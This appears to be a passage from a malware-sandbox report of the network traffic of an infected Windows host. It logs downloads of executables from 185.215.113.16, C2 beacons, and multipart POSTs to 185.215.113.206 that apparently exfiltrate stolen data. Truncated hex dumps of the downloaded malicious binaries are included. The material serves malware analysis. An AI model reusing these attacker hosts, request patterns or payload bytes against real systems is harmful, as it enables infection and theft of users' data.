0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Dec 9, 2024 08:08:35.903647900 CET	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49829	185.215.113.16	80	7804	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:30.882541895 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 9, 2024 08:08:32.221751928 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:08:31 GMT Content-Type: application/octet-stream Content-Length: 970752 Last-Modified: Mon, 09 Dec 2024 06:19:27 GMT Connection: keep-alive ETag: "67568bef-ed000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e7 8b 56 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 20 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELVg" w@0J@@@d\|@Peu4@.text `.rdata@@.datalpH@.rsrcPe@f@@.relocuvZ@B
Dec 9, 2024 08:08:32.221807003 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
Dec 9, 2024 08:08:32.221817970 CET	1236	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Dec 9, 2024 08:08:32.221932888 CET	1236	IN	Data Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c Data Ascii: N^VW3DNF\|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
Dec 9, 2024 08:08:32.221942902 CET	1236	IN	Data Raw: 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7 Data Ascii: _^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3
Dec 9, 2024 08:08:32.221995115 CET	1236	IN	Data Raw: 00 83 f8 12 0f 8d e0 04 04 00 83 e8 04 83 f8 0a 77 94 ff 24 85 85 27 40 00 6a 7f 58 66 3b d8 0f 84 c2 06 04 00 8b 19 33 c0 66 85 c0 74 1c 8b 45 90 40 89 45 90 8b 1c 81 0f b7 43 08 66 3b 85 50 ff ff ff 75 e4 e9 9d 06 04 00 83 3b 05 75 df 8b 04 91 Data Ascii: w$'@jXf;3ftE@ECf;Pu;u3f9X'ULUf9Y]79^99L99!:9#, rU]
Dec 9, 2024 08:08:32.222008944 CET	1236	IN	Data Raw: 85 79 02 04 00 38 5f 08 75 1c 8b 47 04 6a 08 50 8b 70 04 e8 c8 d5 01 00 59 59 89 77 04 88 5f 09 ff 0f 5f 5e 5b c3 b3 01 eb f3 55 8b ec 56 8b f1 80 7e 09 00 0f 85 5f 02 04 00 6a 08 e8 ad d5 01 00 59 8b 4d 08 8b 09 89 08 8b 4e 04 89 48 04 89 46 04 Data Ascii: y8_uGjPpYYw__^[UV~_jYMNHF^]UQSV3W8^?8^u7~G0EtO ,O$j8WIEYYF^_^[UWVj8)YuON0w^_]UVuWO
Dec 9, 2024 08:08:32.222019911 CET	1236	IN	Data Raw: a3 88 13 4d 00 ff d6 57 ff 35 8c 13 4d 00 ff d6 5f 5e c3 55 8b ec 83 ec 40 a1 58 13 4d 00 56 33 f6 a3 04 19 4d 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 3c c7 49 00 89 45 e4 8b 45 10 Data Ascii: MW5M_^U@XMV3MjE0E+uEEu<IEEEEEEPuEIE}A0IhIfM IMEPEE;Ijjj!jjIh5M\M4IPj5\MI5`M^UVW
Dec 9, 2024 08:08:32.222153902 CET	1236	IN	Data Raw: cc 00 00 00 2d 8f 00 00 00 0f 84 d8 fc 03 00 48 83 e8 01 0f 84 ba fc 03 00 2d ff 01 00 00 0f 84 94 fc 03 00 2d ef 00 00 00 0f 84 8f 00 00 00 3b 3d 28 25 4d 00 0f 84 58 fc 03 00 ff 75 0c ff 75 08 57 56 ff 15 08 c7 49 00 5f 5e 5b 8b e5 5d c3 85 c0 Data Ascii: -H--;=(%MXuuWVI_^[]tt%jVIM73jhjV$IhI I=M(%MuIMuQQVMjIU<SVWj,EE0jP
Dec 9, 2024 08:08:32.222163916 CET	1236	IN	Data Raw: 4d 00 ff 53 56 57 33 db c7 05 94 19 4d 00 01 01 01 01 68 58 cb 49 00 89 1d 90 19 4d 00 66 89 1d 98 19 4d 00 c6 05 9a 19 4d 00 01 c7 05 9c 19 4d 00 09 00 00 00 89 1d a8 19 4d 00 e8 0a 66 00 00 68 3c cb 49 00 b9 bc 19 4d 00 e8 fb 65 00 00 b9 cc 19 Data Ascii: MSVW3MhXIMfMMMMfh<IMeMrMrMrM4MMMMMMMMj_MMMMMMMMM M$M0Mrud
Dec 9, 2024 08:08:32.341650963 CET	1236	IN	Data Raw: 53 52 51 ff 15 18 c0 49 00 85 c0 75 4f 8b 45 0c 57 8d 3c 00 8d 45 fc 89 7d fc 50 56 53 53 ff 75 08 ff 75 f8 ff 15 20 c0 49 00 85 c0 75 15 8b 45 fc d1 e8 89 45 fc 3b 45 0c 73 18 33 c9 66 89 0c 46 b3 01 ff 75 f8 ff 15 1c c0 49 00 8a c3 5f 5e 5b c9 Data Ascii: SRQIuOEW<E}PVSSuu IuEE;Es3fFuI_^[3fD72V\|M]8MW3=MZ=@M M@I95(Mv"$Mj4$MYY<F;5(Mr5$M=(MYMM<I5M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49848	185.215.113.43	80	7804	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:36.510998964 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 33 37 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013374001&unit=246122658369
Dec 9, 2024 08:08:37.844743967 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:08:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49854	185.215.113.16	80	7804	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:37.969082117 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 9, 2024 08:08:39.309267044 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:08:38 GMT Content-Type: application/octet-stream Content-Length: 2724864 Last-Modified: Mon, 09 Dec 2024 06:19:53 GMT Connection: keep-alive ETag: "67568c09-299400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 c4 3e 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ @>`Ui` @ @.rsrc`2@.idata 8@quaaapuk@)2):@agtviptv )l)@.taggant@*"r)@
Dec 9, 2024 08:08:39.309315920 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:39.309329033 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:39.309340954 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:39.309354067 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:39.309366941 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:39.309556961 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 9, 2024 08:08:39.309568882 CET	1236	IN	Data Raw: 1c 19 03 09 f4 76 04 ce 7c 65 02 46 6d 9b 5f f8 18 b2 69 e8 d9 50 56 a8 a8 2b 38 c7 42 b0 c8 dd d4 9d ae 6c 3e 8e 89 28 25 e6 3f fe 4d 54 f4 c8 89 2c 24 f8 c5 1f f7 c3 7b 4e 01 c2 8b 24 bb da 8d 17 14 08 f4 22 10 20 d8 3b 23 be 69 35 01 59 b6 fe Data Ascii: v\|eFm_iPV+8Bl>(%?MT,${N$" ;#i5Y/B9}\|DtJ^ni;"e9uA-)r/:0YP^ns88W;m?+5Fyzk!C 7?,}8/iE
Dec 9, 2024 08:08:39.309580088 CET	1236	IN	Data Raw: 08 1a 1a 1e 30 1a 1e ea 18 05 a3 fe 72 3d 18 77 ba 45 14 02 ec 50 36 e7 a9 a2 3e 0e 90 5d 0e 09 ba 45 4e e8 1b 7d 52 0b 21 10 90 86 90 1a 5a 08 ba 79 1a 36 ec 61 6a fc dd b6 74 42 b8 3d 76 df e9 3e ae 62 73 99 07 90 90 9d 26 09 fa 2e 8e 56 02 d5 Data Ascii: 0r=wEP6>]EN}R!Zy6ajtB=v>bs&.V@H55~9x(Bn.BtjO.NER}XB.s.1E5H<Ei>H(%Ixhcx]qj}sE#P"I!ofO~P1
Dec 9, 2024 08:08:39.309592962 CET	1148	IN	Data Raw: d1 37 13 0f e6 55 1a db cc 82 ca 08 85 01 0a 7d 7f 10 1c 36 c0 2a 3e af 74 73 49 27 df f5 6f ac d6 42 48 39 7e 96 3c cd 0a 74 ef db 99 2f 4f 9f ca 1d 6e 18 70 80 8b 2a 8a 0d 78 2a db 70 6a 63 02 2a 66 f7 8b 74 5e 11 81 e7 ae 09 f8 ca 33 5a 3d 03 Data Ascii: 7U}6>tsI'oBH9~<t/Onpxpjcft^3Z=hh9E8+Do;B\Rn?t*"03?G#z'DH9,''AN.%%91;kKJR;t Sp:\|H4.#zIsGj
Dec 9, 2024 08:08:39.439263105 CET	1236	IN	Data Raw: a0 44 0e bb 67 15 fb c8 ab 0c fa c3 76 ae 00 e6 ac 12 fa c6 bc 02 d2 66 b6 12 46 06 7a 8d 9f ee 66 9d 15 cb ed 13 3b cd 6d 12 ff 09 70 2f 01 d7 71 15 03 4a ab 1b fa b8 72 f1 fe cb 6e ad a9 d7 79 d5 ff dd f6 29 18 e6 a9 31 1e a5 ea b5 cd ea 6e 1d Data Ascii: DgvfFzf;mp/qJrny)1nvxb1V<mIn1ZjG.q"m!`.?wr"nfh\|dp[::iK_hkv\|k-/0;)r=*+O7d.#D/$R)tCr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49880	185.215.113.206	80	1608	C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:47.862145901 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIIIJDHJEGIECBGHIJE Host: 185.215.113.206 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Dec 9, 2024 08:08:47.862145901 CET	1451	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 36 33 65 32 Data Ascii: ------GIIIIJDHJEGIECBGHIJEContent-Disposition: form-data; name="token"3063e26ce9b4591df7767a42cfdec3723fabd0e3b796edb33c6972e60283fdd40f1a5672------GIIIIJDHJEGIECBGHIJEContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
Dec 9, 2024 08:08:49.704195976 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 9, 2024 08:08:50.311439991 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEGHJJDGHCAKEBGIJKJ Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 36 33 65 32 36 63 65 39 62 34 35 39 31 64 66 37 37 36 37 61 34 32 63 66 64 65 63 33 37 32 33 66 61 62 64 30 65 33 62 37 39 36 65 64 62 33 33 63 36 39 37 32 65 36 30 32 38 33 66 64 64 34 30 66 31 61 35 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IIEGHJJDGHCAKEBGIJKJContent-Disposition: form-data; name="token"3063e26ce9b4591df7767a42cfdec3723fabd0e3b796edb33c6972e60283fdd40f1a5672------IIEGHJJDGHCAKEBGIJKJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIEGHJJDGHCAKEBGIJKJContent-Disposition: form-data; name="file"------IIEGHJJDGHCAKEBGIJKJ--
Dec 9, 2024 08:08:51.252360106 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 9, 2024 08:08:52.922920942 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAEHJEBKFCAKKFIEHDBF Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 36 33 65 32 36 63 65 39 62 34 35 39 31 64 66 37 37 36 37 61 34 32 63 66 64 65 63 33 37 32 33 66 61 62 64 30 65 33 62 37 39 36 65 64 62 33 33 63 36 39 37 32 65 36 30 32 38 33 66 64 64 34 30 66 31 61 35 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="token"3063e26ce9b4591df7767a42cfdec3723fabd0e3b796edb33c6972e60283fdd40f1a5672------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="file"------CAEHJEBKFCAKKFIEHDBF--
Dec 9, 2024 08:08:53.858993053 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 9, 2024 08:08:54.517529011 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 9, 2024 08:08:54.955132008 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:54 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Dec 9, 2024 08:08:54.955346107 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
Dec 9, 2024 08:08:54.955363989 CET	1236	IN	Data Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh\|$,}uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$
Dec 9, 2024 08:08:54.956562996 CET	1236	IN	Data Raw: 55 89 e5 53 57 56 83 ec 24 8b 4d 1c 8b 75 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 7d 08 8d 59 f8 83 f9 10 75 32 8d 45 dc 8d 4d e0 6a 10 ff 75 18 6a 10 50 51 57 e8 f7 93 06 00 83 c4 18 89 c7 8d 75 e8 83 45 dc f8 c7 45 d8 00 00 00 00 85 ff 0f 85 b4 01 Data Ascii: USWV$Mu01E}Yu2EMjujPQWuEEC1;]vS{EE1uuSPVEPo9]SUYY)ZYEME]M)19D
Dec 9, 2024 08:08:54.956574917 CET	1236	IN	Data Raw: 00 00 00 0f 57 c8 0f 11 8c 0e 9c 00 00 00 83 c1 20 83 c3 fe 75 a6 eb 02 31 c9 f6 c2 01 74 28 0f 10 04 0f 0f 10 4c 0e 0c 0f 57 c8 0f 10 84 0e 8c 00 00 00 0f 11 4c 0e 0c 0f 10 0c 0f 0f 57 c8 0f 11 8c 0e 8c 00 00 00 31 db 8b 55 ac 39 c2 74 6b f6 c2 Data Ascii: W u1t(LWLW1U9tkt0T0U19t<f.0L0L0LL09uM17L^_[]USWVh1
